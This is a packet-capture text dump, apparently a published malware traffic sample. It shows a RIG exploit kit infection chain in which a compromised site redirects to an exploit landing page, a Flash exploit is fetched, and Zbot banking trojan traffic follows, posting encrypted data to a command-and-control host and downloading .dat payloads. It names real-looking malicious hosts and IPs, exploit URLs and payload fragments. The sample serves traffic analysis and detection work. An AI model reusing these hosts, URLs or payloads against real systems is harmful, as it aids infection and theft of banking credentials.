RIG Exploit Kit Flash Vulnerability Zbot Malware Banking Trojan Traffic Analysis Sample PCAP file download

2016-08-15 16:15:47.762141 IP 192.168.4.199.49320 > 204.93.232.121.80: Flags [P.], seq 1:326, ack 1, win 16475, length 325: HTTP:
GET / HTTP/1.1
E..m..@…p_…..].y…P%.{.WhI9P.@[B…GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: laspecialty.com
Connection: Keep-Alive
Cookie: c2b1b4c39b7f3382005f891501443e28=36645e4282139cae3eee4e1b46cf68f7


2016-08-15 16:15:49.603587 IP 192.168.4.199.49322 > 185.158.152.195.80: Flags [.], ack 1, win 16475, length 0
E..(..@…………….PyO0.q..NP.@[……….
2016-08-15 16:15:49.603744 IP 192.168.4.199.49322 > 185.158.152.195.80: Flags [P.], seq 1:474, ack 1, win 16475, length 473: HTTP
: GET /?xXqKd7CULhrICYA=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1
cmQ9laHYghP7ZXHHeU-iVvxybAdc810kROD7zRVzr9PUQlF6AoSnazJBKqE HTTP/1.1
E…..@….*………..PyO0.q..NP.@[….GET /?xXqKd7CULhrICYA=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_Opqx
veN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZXHHeU-iVvxybAdc810kROD7zRVzr9PUQlF6AoSnazJBKqE HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://laspecialty.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: hgf.houstonworkshop.com
Connection: Keep-Alive

2016-08-15 16:15:51.406088 IP 192.168.4.199.49322 > 185.158.152.195.80: Flags [.], ack 49446, win 16253, length 0
E..(..@…………….PyO5.q.osP.?}……….
2016-08-15 16:15:51.592767 IP 192.168.4.199.49322 > 185.158.152.195.80: Flags [P.], seq 1161:1805, ack 49446, win 16253, length 644: HTTP: GET /index.php?xXqKd7CULhrICYA=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZXHHeU-iVvxybAdc810kROD7zRVzr9PUQlF6AoSnazJBKqKp0N6RgBnEB_CbJQlqw-BF3H6PXl5gv2pHn4oieWX_PB1m5AmmA HTTP/1.1
E…..@….a………..PyO5.q.osP.?};?..GET /index.php?xXqKd7CULhrICYA=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZXHHeU-iVvxybAdc810kROD7zRVzr9PUQlF6AoSnazJBKqKp0N6RgBnEB_CbJQlqw-BF3H6PXl5gv2pHn4oieWX_PB1m5AmmA HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://hgf.houstonworkshop.com/?xXqKd7CULhrICYA=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB
x-flash-version: 16,0,0,235
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: hgf.houstonworkshop.com
Connection: Keep-Alive

2016-08-15 16:15:51.798292 IP 192.168.4.199.49321 > 185.158.152.195.80: Flags [P.], seq 1:454, ack 1, win 16475, length 453: HTTP: GET /index.php?xXqKd7CULhrICYA=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZXHHeU-iVvxybAdc810kROD7zRVzr9PUQlF6AoSnazJBKqKp0N6RgBnEB_CbJQlqw-fECT6PXl5gv2pHn4oieWX_PNwm5Mo3lM&dfgsdf=2907 HTTP/1.1
E…..@…………….P….`…P.@[u…GET /index.php?xXqKd7CULhrICYA=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZXHHeU-iVvxybAdc810kROD7zRVzr9PUQlF6AoSnazJBKqKp0N6RgBnEB_CbJQlqw-fECT6PXl5gv2pHn4oieWX_PNwm5Mo3lM&dfgsdf=2907 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: hgf.houstonworkshop.com
Connection: Keep-Alive
2016-08-15 16:15:51.842908 IP 185.158.152.195.80 > 192.168.4.199.49322: Flags [.], ack 1805, win 516, length 0

2016-08-15 16:17:13.114467 IP 192.168.4.199.49331 > 115.28.36.224.80: Flags [.], ack 1, win 16475, length 0
E..(..@………s.$….P -..=IUYP.@[……….
2016-08-15 16:17:13.114681 IP 192.168.4.199.49331 > 115.28.36.224.80: Flags [P.], seq 1:414, ack 1, win 16475, length 413: HTTP: GET /copyright/files/c.c HTTP/1.1
E…..@………s.$….P -..=IUYP.@[Od..GET /copyright/files/c.c HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://hgf.houstonworkshop.com/index.php?xXqKd7CULhrICYA=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQ
x-flash-version: 16,0,0,235
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.doswf.com
Connection: Keep-Alive

 

2016-08-15 16:18:13.583902 IP 192.168.4.199.49337 > 95.163.118.88.80: Flags [P.], seq 1:607, ack 1, win 16475, length 606: HTTP: POST /forum/visitcounter.php HTTP/1.1
E…..@…L …._.vX…P…..~.>P.@[.N..POST /forum/visitcounter.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: vetrogjkzoqe.site
Content-Length: 370
Connection: Keep-Alive
Cache-Control: no-cache

……=s$….F.k..xz….|.V..<..w..$YxZd..[.    \…:Yd6sI .J..).).LJ….       …`…d..WK….^……………na.7…..*…,…`rC.S9I…`…YZ`..6.a..}..rW.BGcs…H.4..A&..t……m..W..FF.yH.htL.Qk.Z….6..U.D.#.d<..h……tg.~3.RJ…..8.T!…z.’..|Hw3w..IS….}..^.q …      ……..5`..MU..$#.@..*……….P[…~….g..|..%Sz..(./8…W…..@…F3.K%..JU..d..9cl.G.s..4…….o.

2016-08-15 16:18:14.256590 IP 192.168.4.199.49338 > 95.163.118.88.80: Flags [.], ack 1, win 16475, length 0
E..(..@…Ny…._.vX…P..v.Y”..P.@[……….
2016-08-15 16:18:14.256786 IP 192.168.4.199.49338 > 95.163.118.88.80: Flags [P.], seq 1:202, ack 1, win 16475, length 201: HTTP: GET /forum/js/d.dat HTTP/1.1
E…..@…M….._.vX…P..v.Y”..P.@[Jy..GET /forum/js/d.dat HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: vetrogjkzoqe.site
Cache-Control: no-cache

2016-08-15 16:18:14.491385 IP 95.163.118.88.80 > 192.168.4.199.49338: Flags [.], ack 202, win 473, length 0

2016-08-15 16:18:15.218245 IP 192.168.4.199.49339 > 95.163.118.88.80: Flags [.], ack 1, win 16475, length 0
E..(..@…NM…._.vX…P……M{P.@[.B……..
2016-08-15 16:18:15.218394 IP 192.168.4.199.49339 > 95.163.118.88.80: Flags [P.], seq 1:202, ack 1, win 16475, length 201: HTTP: GET /forum/js/e.dat HTTP/1.1
E…..@…M….._.vX…P……M{P.@[[…GET /forum/js/e.dat HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: vetrogjkzoqe.site
Cache-Control: no-cache

2016-08-15 16:18:15.923830 IP 95.163.118.88.80 > 192.168.4.199.49339: Flags [.], seq 54170:55488, ack 202, win 473, length 1318: HTTP
E..N..@.6..E_.vX…..P….!….rP…D…oJ60wBd9Adu0ptpe5sIgARgZ+ztqhxGSzNAMmRzGbWh5xL8QZKk4nGqoQ1C5z3og37triGlFHw9MGvGK6Ht3kasQLiArVmIFYeTyiTysS+yqzSzTF4EGEJxSyZqaFAqgGETds2ih4UTBabdlxggdnGc31MPQsc0DoCoJYp8wsRjGXYeY+qTffRyelkhDnWNBO7BLlbi+ga16LFJFcevnG0FnYEyna+2adfrC/ENFa4t8fRfyaLkN12uTz34Oe7oeQTjq4aTlipgbDhkQqpHHVfgG6ASU+eWVDlOhroegZKnQzG31KFpsq+utlNWW5nAEXzDaLHz0nQgBgRh0XPwIKg4uvrPSOFVdfo8Ffcd5xJ82NpowCbmOb9QfDBcmFLqMugCrdTFuJAOoMQYsg+Xm34z0orFHxNKWrFplXhFQiW67R06FjHq8MqVLtNrRC+H6f9BDpbiVhq26fas3Gbi0HkHvJNZb+55TcPwtgZdvmZBtT2IQyfCqrCYtEygXbQMX8PK74jRoxLptbQP1WZ0WHnnVvn6M5EOAm5kWKL3y2geYscD91YM748/5Pte9bvPYmiU/0HXGyZD2SVdbvOGetrUKcRoQoXs0FdfIM+WrLTZmsvJPSoSKnGuIwPRyNPLPFAlnVM2eJSuhDUIy0EHdQpOU6Rf7mzH6NBQ62UmZQWgpEFhsYSqceRfuleiN3ALnS28TifcF5QlfZBDqg4uc0Du4baIgHK3n8QJY5QW/8etwPsW0Uc6SMx2VwPV4oklEbTmjai2LRuhHy3eBnZRzpt8qAFTLa60mTFrQxZLeBlZD6UCQ8VjZNkfgJ8s7mXu5CnofHy3EngSwzKzviQDIPUbcYjvwTn4W7YgPUctHXZhjxJkFMBiRuqHFRwheveGxU54Z+9CRNWmtTCnJLHfvQvCx+eXUBMWS9uubmXONz/6ZIyHrtBC65Fwc8yPiRYo6iibTFECl4SJ0DL7ZrNg7bAFU2er5TTTCNoSYamdxMcozNaBsTGy85IxI39C9YmDacfcGReIkcpB3vQQcbWuXeUz97saHFI5BZaHXcJf76+teguv5k/fLrqLgcj5fpCaPVMVyNsIBrTHlRZBGyjCJwKiQsKULQviLHj8fiE6HbN9rUAu1UPf2CS2P/JIXJ3xKUidey1v8yuO3UYrO7qczvDWTE6Grz/pN9V8URGTvkYj3O2Fc1vqSLg7Nm6kIuMbaIp29rP6O3GqeQE+ZzkqdRWfl7sDEAI60TJ3EvmshSFQ51uQnCE0XqIXoGa72LVtyxo43M9JtfAVK8ynn/3tYR+GtsOI6fiULPencXB
2016-08-15 16:18:15.924032 IP 192.168.4.199.49339 > 95.163.118.88.80: Flags [.], ack 55488, win 16475, length 0
E..(.B@…N#…._.vX…P…r..&:P.@[……….